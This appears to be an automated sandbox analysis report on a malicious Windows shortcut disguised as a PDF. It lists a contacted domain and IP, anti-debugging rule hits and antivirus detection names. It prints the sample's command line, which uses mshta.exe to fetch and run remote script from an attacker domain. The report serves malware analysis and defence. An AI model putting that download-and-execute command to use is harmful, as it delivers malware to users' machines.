Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | July 1, 2021, 8:51 a.m. | July 1, 2021, 8:53 a.m. |
Name | Response | Post-Analysis Lookup |
---|---|---|
dadsasoa.in | 31.220.106.229 |
Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\United_States_Project_for_Promise.pdf .lnk |
cmdline | "C:\Windows\System32\mshta.exe" https://dadsasoa.in/font/js/images/files/United-States_Project_for_Promise/css && wscript.exe |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
host | 172.217.25.14 |
Arcabit | Heur.BZC.YAX.Nioc.1.07376574 |
Cyren | LNK/Trojan.TXNC-4 |
TrendMicro-HouseCall | TROJ_FRS.VSNTFL21 |
Kaspersky | HEUR:Trojan.WinLNK.Agent.gen |
BitDefender | Heur.BZC.YAX.Nioc.1.07376574 |
ViRobot | LNK.S.Downloader.494560 |
MicroWorld-eScan | Heur.BZC.YAX.Nioc.1.07376574 |
Rising | Downloader.Mshta/LNK!1.BADA (CLASSIC) |
Ad-Aware | Heur.BZC.YAX.Nioc.1.07376574 |
Sophos | Troj/DownLnk-BD |
TrendMicro | TROJ_FRS.VSNTFL21 |
FireEye | Heur.BZC.YAX.Nioc.1.07376574 |
Emsisoft | Heur.BZC.YAX.Nioc.1.07376574 (B) |
Ikarus | BZC.YAX.Nioc |
Microsoft | Trojan:Script/Wacatac.B!ml |
AegisLab | Trojan.WinLNK.Nioc.4!c |
ZoneAlarm | HEUR:Trojan.WinLNK.Agent.gen |
GData | Heur.BZC.YAX.Nioc.1.07376574 |
ALYac | Trojan.Agent.LNK.Gen |
MAX | malware (ai score=82) |
VBA32 | Trojan.Link.Crafted |
Zoner | Probably Heur.LNKScript |